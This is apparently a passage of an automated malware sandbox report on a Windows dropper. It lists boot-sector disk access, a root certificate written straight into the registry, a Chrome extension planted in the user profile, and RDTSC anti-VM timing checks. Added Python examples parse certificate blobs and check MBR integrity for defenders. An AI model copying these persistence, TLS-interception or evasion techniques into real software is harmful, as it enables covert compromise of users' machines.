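Run it against a dropped file to reproduce the report's row; a mismatch on a signed binary is worth more than one on an unsigned one, because Authenticode covers the checksum field only indirectly (the field is excluded from the signed hash), so a patched-but-still-signed file will show the discrepancy here before signature verification fails.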

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Installs new ROOT certificates
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob
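Writing a `Blob` value under `HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\<SHA1>` installs a trusted root for every user on the machine without going through `certutil` or the Certificates MMC, which is why responders enumerate that key directly rather than trusting the UI. The subkey name is the certificate's SHA-1 thumbprint, and the `Blob` value serialises the certificate context's properties. The following is an added example, not part of the report: a parser for that blob that extracts the DER certificate, recomputes the thumbprint and checks it against the key name. The record layout used here (repeated `DWORD prop_id, DWORD reserved, DWORD length, data`, with property 32 holding the DER certificate, 3 the cached SHA-1 and 11 the UTF-16 friendly name) is the layout I have observed in these values and is an assumption of the example, not documented by the report; the `build_blob` helper fabricates a blob around fake "certificate" bytes so the code runs offline.

```python
import hashlib
import struct

# Property ids as used in the serialised blob (assumed layout, see lead-in).
CERT_SHA1_HASH_PROP_ID = 3
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32


def parse_cert_blob(blob: bytes) -> dict:
    """Split a SystemCertificates 'Blob' value into {prop_id: raw bytes}.

    Each record is (DWORD prop_id, DWORD reserved, DWORD length) followed by
    `length` bytes; a truncated record or trailing garbage raises.
    """
    props, off = {}, 0
    while off + 12 <= len(blob):
        prop_id, _reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if off + length > len(blob):
            raise ValueError(f"truncated property {prop_id} at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    if off != len(blob):
        raise ValueError("trailing bytes after last property")
    return props


def thumbprint(props: dict) -> str:
    """SHA-1 of the DER certificate, upper-case hex: the registry key name must equal this."""
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("blob carries no certificate (property 32)")
    return hashlib.sha1(der).hexdigest().upper()


def check_root_entry(key_name: str, blob: bytes) -> dict:
    """Validate one ROOT\\Certificates\\<key_name>\\Blob entry."""
    props = parse_cert_blob(blob)
    tp = thumbprint(props)
    cached = props.get(CERT_SHA1_HASH_PROP_ID)
    friendly = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\0")
    return {
        "thumbprint": tp,
        "key_matches": tp == key_name.upper(),          # key name lies about its contents otherwise
        "cached_hash_matches": cached is None or cached.hex().upper() == tp,
        "friendly_name": friendly,
        "der": props[CERT_CERT_PROP_ID],                  # hand this to an X.509 parser next
    }


def build_blob(der: bytes, friendly: str = "") -> bytes:
    """Constructed blob for testing; `der` is stand-in bytes, not a real certificate."""
    out = struct.pack("<III", CERT_SHA1_HASH_PROP_ID, 1, 20) + hashlib.sha1(der).digest()
    if friendly:
        name = friendly.encode("utf-16-le") + b"\0\0"
        out += struct.pack("<III", CERT_FRIENDLY_NAME_PROP_ID, 1, len(name)) + name
    out += struct.pack("<III", CERT_CERT_PROP_ID, 1, len(der)) + der
    return out


if __name__ == "__main__":
    # On a Windows host the blob comes from winreg, e.g.
    #   winreg.QueryValueEx(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
    #       r"SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\<thumbprint>"), "Blob")
    # Here a constructed blob stands in for it.
    fake_der = b"\x30\x82\x01\x00" + bytes(range(256))
    demo = build_blob(fake_der, "Example Root")
    print(check_root_entry(thumbprint(parse_cert_blob(demo)), demo))
```

The practical use is a baseline: dump every subkey name under `ROOT\Certificates` on a known-good image, then diff a suspect host against it and run `check_root_entry` on anything new, such as the `6C0CE2DD...` entry this sample adds. An extra root that the diff surfaces lets the installer intercept TLS for every application using SChannel and, through Chrome's reliance on the Windows store, the dropped browser extension's traffic as well.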
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\download\download_user.dll
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Roaming\1611970637183.exe
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | File created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon.png
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon48.png
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.html
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\background.js
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\book.js
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\jquery-1.8.3.min.js
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.js
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\manifest.json

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
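The "infect the boot sector" signature, listed here and again under Persistence and Installation Behavior above, fires on the API sequence `CreateFileW("\\.\PhysicalDrive%d")` followed by `DeviceIoControl`. That sequence is necessary for writing an MBR but not sufficient evidence of it: the same calls are used to query disk geometry or serial numbers for licensing and machine fingerprinting, and the report shows no `WriteFile` on the device handle. The check that settles the question on a live host is to read sector 0 of each physical drive and compare it with a known-good baseline. The following is an added example, not part of the report or of the sandbox: an MBR parser plus an assessment routine that flags a changed bootstrap area, a missing `55 AA` signature, overlapping partitions and more than one active partition. The two sectors it analyses are constructed in `build_sector` (the "boot code" is filler and the disk signature is invented); on Windows the real sector comes from opening the same `\\.\PhysicalDrive0` path as an administrator.

```python
import hashlib
import struct

SECTOR = 512
BOOTSTRAP_END = 0x1B8      # 440 bytes of boot code
DISK_SIGNATURE = 0x1B8     # 4-byte NT disk signature, then 2 reserved bytes
PART_TABLE = 0x1BE         # four 16-byte entries
BOOT_SIG = 0x1FE           # 55 AA
ENTRY = "<BBBBBBBBII"      # status, CHS start (3), type, CHS end (3), LBA start, sector count


def parse_mbr(sector: bytes) -> dict:
    """Decode one 512-byte MBR into its bootstrap hash, disk id and partition table."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly one 512-byte sector")
    parts = []
    for i in range(4):
        status, _c0, _c1, _c2, ptype, _e0, _e1, _e2, lba, count = struct.unpack_from(
            ENTRY, sector, PART_TABLE + 16 * i)
        if ptype == 0:
            continue  # empty slot
        parts.append({"index": i, "bootable": status == 0x80, "type": ptype,
                      "lba_start": lba, "sectors": count})
    return {
        "signature_ok": struct.unpack_from("<H", sector, BOOT_SIG)[0] == 0xAA55,
        "bootstrap_sha256": hashlib.sha256(sector[:BOOTSTRAP_END]).hexdigest(),
        "disk_id": struct.unpack_from("<I", sector, DISK_SIGNATURE)[0],
        "partitions": parts,
    }


def assess_mbr(sector: bytes, baseline_bootstrap_sha256: str) -> list:
    """Return the list of findings; an empty list means the sector matches the baseline."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("missing_boot_signature")
    if info["bootstrap_sha256"] != baseline_bootstrap_sha256:
        findings.append("bootstrap_code_changed")   # the bootkit case
    ranges = sorted((p["lba_start"], p["lba_start"] + p["sectors"]) for p in info["partitions"])
    for (a0, a1), (b0, b1) in zip(ranges, ranges[1:]):
        if b0 < a1:
            findings.append("overlapping_partitions")
            break
    if sum(p["bootable"] for p in info["partitions"]) > 1:
        findings.append("multiple_active_partitions")
    return findings


def build_sector(tampered: bool) -> bytes:
    """Constructed MBR: filler boot code, an invented disk id, two NTFS partitions, 55 AA."""
    code = bytes([0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C]) + b"\x90" * 433   # 440 bytes
    if tampered:
        code = b"\xEB\x3C" + code[2:]   # short jump patched over the entry point
    s = bytearray(SECTOR)
    s[:BOOTSTRAP_END] = code
    struct.pack_into("<I", s, DISK_SIGNATURE, 0xDEADBEEF)
    struct.pack_into(ENTRY, s, PART_TABLE, 0x80, 0, 0, 0, 0x07, 0, 0, 0, 2048, 1_000_000)
    struct.pack_into(ENTRY, s, PART_TABLE + 16, 0x00, 0, 0, 0, 0x07, 0, 0, 0, 1_002_048, 500_000)
    struct.pack_into("<H", s, BOOT_SIG, 0xAA55)
    return bytes(s)


if __name__ == "__main__":
    # Windows, elevated: sector = open(r"\\.\PhysicalDrive0", "rb").read(512)
    baseline = parse_mbr(build_sector(tampered=False))["bootstrap_sha256"]
    print("clean:", assess_mbr(build_sector(False), baseline))
    print("patched:", assess_mbr(build_sector(True), baseline))
```

The baseline hash is what makes this useful: the bootstrap code on a fleet built from one image is identical across machines, so one known-good hash per image is enough, and a host whose sector 0 differs after this sample ran is the one to image before rebooting. On GPT disks the protective MBR has a single type 0xEE partition and the same check still applies to its bootstrap area.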
Source: C:\Users\user\AppData\Roaming\1611970637183.exe | Code function: 9_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\msiexec.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1611970637183.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_100204C0
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | RDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC8256EAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FC82584Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825639h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825647h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
